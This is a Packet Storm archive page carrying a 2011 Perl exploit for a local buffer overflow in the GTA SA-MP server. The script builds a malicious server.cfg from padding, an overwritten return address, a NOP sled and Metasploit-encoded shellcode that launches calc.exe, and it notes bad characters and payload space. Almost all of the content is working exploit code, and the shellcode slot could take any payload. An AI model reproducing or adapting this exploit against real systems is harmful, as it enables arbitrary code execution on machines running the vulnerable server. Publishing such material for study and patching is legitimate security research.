exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

GTA SA-MP server.cfg Buffer Overflow

GTA SA-MP server.cfg Buffer Overflow
Posted Sep 26, 2011
Authored by Silent_Dream

GTA SA-MP server.cfg local buffer overflow exploit that spawns calc.exe.

tags | exploit, overflow, local
SHA-256 | de5dd3e9764c6cbc956258a2fcd9340f1d0222af55bef5a774551d1286c9c7c4

GTA SA-MP server.cfg Buffer Overflow

Change Mirror Download
# GTA SA-MP server.cfg Local Buffer Overflow Vulnerability (0day)
# Date: 9-26-11
# Author: Silent_Dream
# Software Link: http://team.sa-mp.com/files/samp03csvr_R2-2_win32.zip
# Tested on: XP SP3, Windows 7
# Thanks to: corelanc0d3r & team, Metasploit, Exploit-db.

#No PPRs found (app compiled with safeseh on), so this exploit uses EIP overwrite instead.
#392 bytes max payload space (after this you hit SEH), 3 badchars: 0x1a, 0x0d, 0x0a.

#Triggering Details: Overwrite server.cfg with this file, run samp-server.exe, boom calculator!

my $file = "server.cfg"; #file must be named server.cfg for bug to trigger.
my $head = "echo "; #probably not needed, tweak if you want.
my $junk = "\x41" x 379;
my $eip = "\xaa\x9f\x42\x00"; #push esp/ret in samp-server.exe
my $nops = "\x90" x 12;
my $adjust = "\x81\xc4\x54\xf2\xff\xff"; #add esp, -3500

my $shellcode =
#x86/shikata_ga_nai succeeded with size 227 (iteration=1)
#Metasploit windows/exec calc.exe -b '\x1a\x0d\x0a'

"\xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9" .
"\xb1\x33\x31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3" .
"\x86\x80\x09\x5b\x57\xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5" .
"\x7c\x99\xd7\x7e\xd0\x09\x63\xf2\xfd\x3e\xc4\xb9\xdb\x71" .
"\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\xa1\xd0\x9f\xf0" .
"\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x16" .
"\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd" .
"\x4a\xd1\x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a" .
"\x25\xeb\x93\x83\xa8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93" .
"\xf4\x2b\x34\x11\xe9\x8b\xbf\x81\xc9\x2a\x13\x57\x99\x20" .
"\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf7\x51\xd1\x2e\xdc" .
"\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x3b\xfc" .
"\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda" .
"\x95\x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e" .
"\x6d\x87\x6d\x8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92" .
"\x1d\x03\x24\x77\x22\xb0\x45\x52\x41\x57\xd6\x3e\xa8\xf2" .
"\x5e\xa4\xb4";

open($File, ">$file");
print $File $head.$junk.$eip.$nops.$adjust.$shellcode;
close($FILE);

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close